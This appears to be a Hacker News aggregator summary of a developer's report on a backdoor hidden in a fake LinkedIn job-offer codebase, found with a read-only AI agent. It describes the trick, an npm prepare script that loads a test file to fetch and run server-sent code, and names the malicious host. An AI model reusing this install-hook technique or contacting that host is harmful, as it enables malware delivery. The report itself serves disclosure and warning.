HN
Today

A backdoor in a LinkedIn job offer

A developer, exercising 'extra paranoia' and using an AI agent, exposed a sophisticated supply-chain backdoor hidden in a LinkedIn job offer's codebase. The trap, disguised as a React/Node project, leveraged the npm install command to execute a malicious payload. This story is a sharp reminder that even job opportunities can be vectors for cunning social engineering attacks, urging vigilance in the HN community.

35
Score
3
Comments
#1
Highest Rank
22h
on Front Page
First Seen
Jun 15, 8:00 PM
Last Seen
Jun 16, 5:00 PM
Rank Over Time
311111122233222245582227

The Lowdown

A developer recounts a brush with a sophisticated social engineering and supply chain attack, initiated through a LinkedIn job offer. What began as a standard recruitment message quickly devolved into a suspicious request to review a codebase, prompting the developer to employ extreme caution and an AI-powered analysis tool.

  • A recruiter from a crypto startup messaged the author on LinkedIn, eventually asking them to review a GitHub repository to address a "deprecated Node modules issue."
  • Sensing a red flag, the author chose a paranoid approach, cloning the repository onto a throwaway VPS and analyzing it with pi, an AI agent in read-only mode.
  • The AI agent immediately flagged app/test/index.js, revealing a hidden backdoor.
  • This backdoor assembled a URL (https://rest-icon-handler.store/icons/77) and contained a payload on a single, minified line designed to execute server-sent code.
  • The malicious code was triggered not by running tests, but by the package.json's prepare script, which automatically runs node app/index.js (and thus require('./test')) upon npm install.
  • The GitHub commits were attributed to a real developer who was being impersonated and denied any involvement.
  • Similarly, the recruiter's LinkedIn profile belonged to an arts journalist, who, when pressed, suddenly displayed expert knowledge of npm and Node versions.
  • The author emphasizes that such sophisticated attacks can ensnare anyone, advocating for vigilance and good security hygiene, and highlighting the utility of AI agents for code review.

Ultimately, this incident serves as a powerful case study in modern cyber threats, demonstrating how attackers use convincing social engineering and technical trickery to distribute malware. It underscores the critical need for skepticism and robust security practices, particularly when interacting with unfamiliar code or digital identities.